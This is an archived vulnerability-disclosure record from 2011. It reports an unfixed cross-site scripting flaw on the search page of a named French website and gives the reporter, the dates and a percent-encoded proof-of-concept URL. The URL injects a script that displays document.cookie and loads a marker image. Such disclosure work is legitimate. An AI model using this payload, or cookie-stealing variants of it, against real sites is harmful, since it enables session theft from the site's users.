Unfixed XSS vulnerability at www.cesi-entreprises.fr

2011-03-17T00:00:00
ID XSSED:72366
Type xssed
Reporter warvector
Modified 2011-12-13T00:00:00

Description

Security researcher warvector, has submitted on 17/03/2011 a cross-site-scripting (XSS) vulnerability affecting www.cesi-entreprises.fr, which at the time of submission ranked 1021481 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 13/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.cesi-entreprises.fr/recherche.asp?motcle=w00t%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%69%6D%67%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%76%75%6C%6E%2E%78%73%73%65%64%2E%6E%65%74%2F%74%68%69%72%64%70%61%72%74%79%2F%73%63%72%69%70%74%73%2F%78%73%73%65%64%2E%67%69%66%22%20%2F%3E&marque=7